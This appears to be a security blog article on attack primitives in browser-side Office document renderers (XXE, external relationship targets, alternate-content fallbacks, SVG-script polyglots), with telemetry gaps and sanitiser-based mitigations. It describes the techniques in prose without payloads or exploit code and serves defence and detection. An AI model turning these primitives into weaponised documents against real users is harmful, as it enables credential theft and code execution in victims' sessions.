The .docx in your webmail preview pane

Browser-side OOXML rendering - the family of libraries that take a .docx, .xlsx, or .pptx and project it pixel-for-pixel into a canvas or DOM without invoking the Office runtime - has become a soft target. The bug class is not new. The exposure surface is. Modern document viewers embedded in webmail, ticketing systems, EDR consoles, and collaboration suites parse the OOXML container client-side. The parser runs in the renderer process. The trust boundary that used to sit at the Office sandbox now sits at the browser. The browser was not built to enforce it. CVE-2023-36884 demonstrated the pattern at the Office layer. The browser-side equivalents are now landing.

The bug class is XML structure misinterpretation in a context that downstream treats as trusted markup. OOXML is a ZIP archive built to ISO/IEC 29500. Inside it: a [Content_Types].xml manifest, relationship parts under _rels/, the main document body, embedded media, and references to external resources. The specification is permissive. Parsers diverge on namespace handling, on alternate content blocks (mc:AlternateContent), on relationship target resolution, on the difference between Target and TargetMode="External". When a browser-side renderer normalises that structure into HTML or SVG for display, the divergence becomes a primitive. The renderer trusts the parser. The parser trusts the input. The input was attacker-controlled the moment it arrived as an email attachment.

The first primitive is XML External Entity injection. CWE-611. The OOXML body is XML. If the parser is constructed without explicit entity disabling - FEATURE_SECURE_PROCESSING in Java, defusedxml in Python, XmlResolver = null in .NET - a crafted document declares an entity that references a remote URL or a local file. On the server side this leaks credentials, SSRF-pivots into the internal network, or exfiltrates files. In a browser-side renderer the resolution happens from the user’s session. The renderer becomes a confused deputy. It fetches the entity over the user’s authenticated origin. NTLM hashes, in environments with WebDAV reachability, leave the host. T1187, forced authentication, executed without a single shell command.

The second primitive is the relationship part. The _rels/document.xml.rels file maps relationship IDs to targets. The OOXML spec allows external targets. Word resolves them on open. The Follina chain - CVE-2022-30190, CVSS 7.8 - used a remote OLE template that resolved to an ms-msdt: URI, which Word handed to MSDT, which executed PowerShell. Storm-0978 weaponised the variant tracked as CVE-2023-36884 against Ukrainian and NATO targets through 2023. The browser-side equivalent does not need MSDT. It needs a renderer that fetches external relationship targets to produce a faithful render and a URL handler the browser will dispatch. The renderer issues the fetch. The handler is invoked. Code reaches a context the renderer was not supposed to influence. T1221, template injection, ported to the browser parser.

The third primitive is the alternate content fallback. mc:AlternateContent lets a document declare a primary rendering and a fallback. The Office runtime picks one. Browser-side renderers built for fidelity tend to walk both branches - primary for layout, fallback for compatibility. An attacker places benign content in the primary branch and the malicious construct in the fallback. Static analysis sandboxes that only render the primary report clean. The user’s renderer processes both. Detonation in user context. T1027.009, embedded payloads, applies directly.

The fourth primitive is the polyglot. A file that is a valid OOXML container and a valid something-else. ZIP polyglots are well documented. OOXML adds DrawingML, which embeds SVG, which embeds <script> blocks under namespaces the OOXML parser ignores but the renderer’s SVG handler executes. The boundary failure is the assumption that whatever the OOXML parser accepts is safe to pass to an SVG renderer. The SVG renderer in the browser obeys SVG semantics. Script executes in the document origin. From there the attack uses the origin’s cookies, fetches the origin’s APIs, and pivots inside the application that embedded the viewer. T1059.007, JavaScript execution, reached without a single line of code arriving as JavaScript.

Real-world exploitation of the OOXML family is established. Forest Blizzard, attributed to GRU Unit 26165, used CVE-2023-23397 - an Outlook OOXML-adjacent NTLM relay - through 2023. Storm-0978, the RomCom operator, used CVE-2023-36884 the same year. TA505 and Cobalt Strike loaders have used template injection since 2019. The migration from desktop Office to browser-rendered Office in webmail and SaaS file viewers extends the same primitives to a renderer that lacks Protected View, lacks Mark of the Web inheritance, and lacks the macro trust prompt. The mitigations the Office team spent fifteen years building do not transfer.

In telemetry the gap is sharp. Desktop Office exploitation produces signal. Sysmon EID 1 records winword.exe spawning unexpected children. EID 11 catches the temp file write. EID 22 catches the suspicious DNS query. Defender for Endpoint surfaces Office-spawning-script under SuspiciousActivity. The detection stack is mature. Browser-rendered OOXML produces almost none of it. The parsing happens inside chrome.exe or msedge.exe. The fetch for an external entity is one more outbound HTTPS connection among thousands. The SVG-script execution is renderer-internal. No process spawn. No file write outside the browser cache. Sysmon does not see the boundary cross. EDR vendors instrument the browser process for known categories - credential theft, injection, COM abuse - but not for document-parser-derived primitives. The signal defenders relied on for fifteen years of Office exploitation is not produced.

Network-layer telemetry is partial. Egress to the entity URL is visible in proxy logs. The retrieval pattern - a fetch for a .dotx, .xml, or unusual MIME type from an unknown domain, originating from a browser session that just rendered an attachment - is correlatable if the SIEM has the join. Most do not. The browser does not annotate the fetch with the originating document. The proxy sees a generic GET. The correlation lives only in the renderer process, where no telemetry is emitted. The detection gap is the absence of provenance on browser-initiated subresource fetches triggered by document rendering.

The detection engineering that closes part of the gap is browser-process telemetry enrichment. Chromium’s DevTools Protocol exposes Network.requestWillBeSent with initiator stack traces. An EDR that hooks the renderer through an enterprise managed extension can capture the initiator of each subresource fetch. Fetches initiated from a document-rendering library - identifiable by the script URL of the initiator and the document MIME type of the page that triggered them - correlate to document-driven egress. The control is non-trivial. It requires extension deployment, renderer instrumentation, and a SIEM schema that carries initiator provenance. Few enterprises operate it. The vendors that ship browser extensions for credential theft detection have the hook but not the rule.

The patch boundary depends on the renderer. The libraries in this space - Mammoth, docx-preview, SheetJS, and the proprietary engines inside major SaaS viewers - patch on their own cadences. CVE assignment for client-side library bugs is inconsistent. Many issues land as silent fixes in minor releases without an advisory. The residual exposure post-patch is the long tail of embedded viewers in vendor products that pin a vulnerable library version. Even after the underlying library ships a fix, the SaaS that bundled it ships on its own deploy cycle. Enterprise procurement of document-rendering features rarely tracks the transitive dependency. The CVE that closes the bug in the library does not close the bug in the product that shipped the library six months ago.

What still applies post-patch is the architectural condition. A browser-side renderer that aims for pixel fidelity must process the full OOXML structure. Full structure means full attack surface. Entity disabling, external-target blocking, alternate content branching restrictions, and SVG sanitisation through a strict allow-list are necessary controls. None of them are default in the libraries shipping today. The renderer that fails closed - strips relationships with external targets, refuses entities, drops mc:AlternateContent fallbacks, and routes SVG through DOMPurify with USE_PROFILES: {svg: true} and FORBID_TAGS: ['script', 'foreignObject'] - sacrifices fidelity. The renderer that preserves fidelity preserves the primitive. The trade is structural. The bug is the assumption that pixel-faithful rendering of an attacker-controlled document is a function a browser can perform safely. It is not.

See also: NordVPN for tunneled traffic when operating outside controlled networks.

#ad Contains an affiliate link.

The .docx in your webmail preview pane

Keep Reading

One grep, full repo access

Your image parser is a remote kill switch

The flat line is the exploit

Stay in the loop